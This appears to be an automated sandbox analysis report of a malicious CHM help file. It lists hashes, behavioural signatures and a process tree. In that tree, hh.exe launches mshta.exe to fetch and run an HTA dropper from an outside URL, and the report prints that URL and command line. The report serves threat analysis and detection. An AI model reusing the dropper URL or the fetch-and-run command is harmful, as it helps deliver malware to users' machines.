Analysis
-
max time kernel
146s -
max time network
149s -
platform
windows7_x64 -
resource
win7-20230220-en -
resource tags
arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system -
submitted
12/04/2023, 03:36
Static task
static1
Behavioral task
behavioral1
Sample
a13fb4e11b31d109a1b145f20ea4b929.chm
Resource
win7-20230220-en
5 signatures
150 seconds
Behavioral task
behavioral2
Sample
a13fb4e11b31d109a1b145f20ea4b929.chm
Resource
win10v2004-20230220-en
3 signatures
150 seconds
General
-
Target
a13fb4e11b31d109a1b145f20ea4b929.chm
-
Size
186KB
-
MD5
a13fb4e11b31d109a1b145f20ea4b929
-
SHA1
6f0f2c3ee8a9a69808d23966fecf0f4b0782ed4c
-
SHA256
e6d9c5a401a733ceb80b004deb347092affe572eda4e1ca6aa6c77bb0c6ea7e8
-
SHA512
b81d653bdb852e25283f302c2ae82e10ddbce9276b3dc8603c56d25bcdaaa9705db1d9a802931adcd5fbf82ab8d704051164dd5011cfb3dae6db4c9887e00383
-
SSDEEP
3072:RbKi0Oh8ptx6O2ZEULuXPG+gmi52vebQyOZbFlTaE8dgko48P8XU:R+i068BpuERfG1mi5oestZbFlT1Jkv8h
Score
10/10
Malware Config
Extracted
Language
hta
Source
URLs
hta.dropper
http://attiferstudio.com/install.bak/sony/6.html
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 4 1932 mshta.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2647223082-2067913677-935928954-1000\Software\Microsoft\Internet Explorer\Main hh.exe Key created \REGISTRY\USER\S-1-5-21-2647223082-2067913677-935928954-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: 33 1852 AUDIODG.EXE Token: SeIncBasePriorityPrivilege 1852 AUDIODG.EXE Token: 33 1852 AUDIODG.EXE Token: SeIncBasePriorityPrivilege 1852 AUDIODG.EXE -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 1808 hh.exe 1808 hh.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 1808 wrote to memory of 1932 1808 hh.exe 29 PID 1808 wrote to memory of 1932 1808 hh.exe 29 PID 1808 wrote to memory of 1932 1808 hh.exe 29
Processes
-
C:\Windows\hh.exe"C:\Windows\hh.exe" C:\Users\Admin\AppData\Local\Temp\a13fb4e11b31d109a1b145f20ea4b929.chm1⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1808 -
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" http://attiferstudio.com/install.bak/sony/6.html ,2⤵
- Blocklisted process makes network request
- Modifies Internet Explorer settings
PID:1932
-
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0xc81⤵
- Suspicious use of AdjustPrivilegeToken
PID:1852